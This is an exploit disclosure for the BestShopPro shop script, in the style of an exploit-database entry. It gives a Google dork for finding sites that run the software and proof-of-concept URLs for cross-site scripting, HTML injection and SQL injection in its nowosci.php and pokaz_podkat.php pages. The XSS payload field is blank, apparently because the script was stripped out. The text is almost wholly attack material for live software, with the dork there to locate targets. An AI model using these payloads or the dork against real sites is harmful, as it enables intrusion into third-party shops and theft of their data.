################################################################################################ # Exploit Title: BST - BestShopPro (nowosci.php) Multiple Vulnerabilities # # Author : CoBRa_21 # # E-Mail : uyku_cu [at] windowslive.com # # Google Dork : "Powered By BST" # # Script Page : http://www.bst.pl ################################################################################################ # # XSS: # # http://127.0.0.1/nowosci.php?a=1&str= # # HTML: # # http://127.0.0.1/nowosci.php?a=1&str=CoBRa_21 # # SQL : # # http://127.0.0.1/pokaz_podkat.php?idkat=10&order1=1&str=' (SQL) # ################################################################################################